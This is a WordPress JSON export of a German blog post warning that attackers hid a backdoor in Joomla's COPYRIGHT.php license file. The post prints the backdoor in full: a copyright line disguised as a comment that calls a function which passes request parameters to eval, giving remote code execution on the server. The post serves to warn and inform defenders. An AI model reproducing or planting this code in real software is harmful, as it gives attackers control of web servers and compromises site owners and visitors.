{"id":45,"date":"2013-08-26T10:15:45","date_gmt":"2013-08-26T08:15:45","guid":{"rendered":"http:\/\/www.zerberos.com\/?p=45"},"modified":"2018-05-24T10:45:19","modified_gmt":"2018-05-24T10:45:19","slug":"hacker-versteckt-code-in-der-open-source-lizenzdatei","status":"publish","type":"post","link":"https:\/\/www.netsolution.ch\/en\/2013\/08\/hacker-versteckt-code-in-der-open-source-lizenzdatei\/","title":{"rendered":"Hacker versteckt Code in der Open Source Lizenzdatei"},"content":{"rendered":"<p>B\u00f6sartiger Code auf einem Webserver kann sehr klein sein &#8211; die Wirkung aber sehr gross. Einige Zeilen Code in einer PHP Datei kann gen\u00fcgen damit die Hacker jeden gew\u00fcnschten Befehl ausf\u00fchren k\u00f6nnen.<\/p>\n<p>Damit der Code nicht leicht gefunden wird werden oft un\u00fcbliche &#8220;Verstecke&#8221; gefunden &#8211; zum Beispiel in einer Lizenzdatei des Open Source Content Managements Joomla: COPYRIGHT.php<\/p>\n<p>Diese Datei interessiert meist niemanden gross, so dass oft \u00fcbersehen wird dass auch diese Datei ver\u00e4ndert sein k\u00f6nnte.<\/p>\n<p>Hier das Beispiel &#8211; achten Sie darauf wie bereits in dieser Zeile unauff\u00e4llig eine getarnte PHP Funktion aufgerufen wird welche dann sp\u00e4ter deklariert wird:<\/p>\n<pre>*\/Copyright3_6_56()\/* 1989, 1991 Free Software Foundation\n\n<\/pre>\n<p>[av_icon_box icon=&#8217;124&#8242; position=&#8217;left&#8217; title=&#8217;Code Beispiel&#8217; link=&#8221; linktarget=&#8217;no&#8217; av_uid=&#8217;av-16409&#8242;]<\/p>\n<pre>&lt; ?php\n\/*\t\t\tGNU GENERAL PUBLIC LICENSE\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\nThis program is free software; you can redistribute it and\/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 2 of the License, or\n(at your option) any later version.\n\n..\n\nGNU GENERAL PUBLIC LICENSE\nVersion 2, June 1991\n\n*\/Copyright3_6_56()\/* 1989, 1991 Free Software Foundation, Inc.\n                          675 Mass Ave, Cambridge, MA 02139, USA\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\nPreamble\n\n  The licenses for most software are designed to take away your\nfreedom to share and change it. By contrast, the GNU General Public\nLicense is intended to guarantee your freedom to share and change free\nsoftware--to make sure the software is free for all its users. This\nGeneral Public License applies to most of the Free Software\nFoundation's software and to any other program whose authors commit to\nusing it. (Some other Free Software Foundation software is covered by\nthe GNU Library General Public License instead.) You can apply it to\nyour programs, too.*\/?&gt;\n\nJoomla! derives from copyrighted works licensed under the GNU General\nPublic License.  This version has been modified pursuant to the\nGNU General Public License as of September 15, 2005, and as distributed,\nit includes or is derivative of works licensed under the GNU General\nPublic License or other free or open source software licenses.  Please\nsee the CREDITS.php for a non-exhaustive list of contributors and\ncopyright holders.  A full text version of the GNU GPL version 2 can be\nfound in the LICENSE.php file.  A full text version of the other licenses\nthat Joomla! is derivative of or includes can be found in LICENSES.php.\n\n&lt;? php\nCopyright3_6_56();\nfunction\u00a0Copyright3_6_56(){\nstatic\u00a0$gnu = true;\nif(!$gnu)\u00a0return;\nif(!isset($_REQUEST['gnu'])||!isset($_REQUEST['c_id']))return;\n$gpl=implode('',\u00a0$_REQUEST['gnu']);\neval\u00a0($gpl(\u00a0$_REQUEST['c_id']));\n$gnu=false;\n}<\/pre>\n<p>[\/av_icon_box]<\/p>\n<p>&nbsp;<\/p>\n<p>Die ganze Analyse des Codes gibt es <a href=\"http:\/\/blog.sucuri.net\/2013\/08\/open-source-backdoor-copyrighted-under-gnu-gpl.html\" target=\"_blank\" rel=\"noopener\">hier<\/a> zu lesen<\/p>\n","protected":false},"excerpt":{"rendered":"<p>B\u00f6sartiger Code auf einem Webserver kann sehr klein sein &#8211; die Wirkung aber sehr gross. Einige Zeilen Code in einer PHP Datei kann gen\u00fcgen damit die Hacker jeden gew\u00fcnschten Befehl ausf\u00fchren k\u00f6nnen. Damit der Code nicht leicht gefunden wird werden oft un\u00fcbliche &#8220;Verstecke&#8221; gefunden &#8211; zum Beispiel in einer Lizenzdatei des Open Source Content Managements &#8230; <a title=\"Hacker versteckt Code in der Open Source Lizenzdatei\" class=\"read-more\" href=\"https:\/\/www.netsolution.ch\/en\/2013\/08\/hacker-versteckt-code-in-der-open-source-lizenzdatei\/\" aria-label=\"Read more about Hacker versteckt Code in der Open Source Lizenzdatei\">Read more<\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","rank_math_focus_keyword":"","rank_math_title":"","rank_math_description":"","rank_math_robots":null,"rank_math_canonical_url":"","rank_math_primary_category":"","footnotes":""},"categories":[1,35],"tags":[39,37],"class_list":["post-45","post","type-post","status-publish","format-standard","hentry","category-uncategorized","category-allgemein","tag-hacker-en","tag-security-en"],"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false,"gform-image-choice-sm":false,"gform-image-choice-md":false,"gform-image-choice-lg":false},"uagb_author_info":{"display_name":"netsolution","author_link":"https:\/\/www.netsolution.ch\/en\/author\/netsolution\/"},"uagb_comment_info":0,"uagb_excerpt":"B\u00f6sartiger Code auf einem Webserver kann sehr klein sein &#8211; die Wirkung aber sehr gross. Einige Zeilen Code in einer PHP Datei kann gen\u00fcgen damit die Hacker jeden gew\u00fcnschten Befehl ausf\u00fchren k\u00f6nnen. Damit der Code nicht leicht gefunden wird werden oft un\u00fcbliche &#8220;Verstecke&#8221; gefunden &#8211; zum Beispiel in einer Lizenzdatei des Open Source Content Managements&hellip;","_links":{"self":[{"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/posts\/45","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/comments?post=45"}],"version-history":[{"count":2,"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/posts\/45\/revisions"}],"predecessor-version":[{"id":2697,"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/posts\/45\/revisions\/2697"}],"wp:attachment":[{"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/media?parent=45"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/categories?post=45"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.netsolution.ch\/en\/wp-json\/wp\/v2\/tags?post=45"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}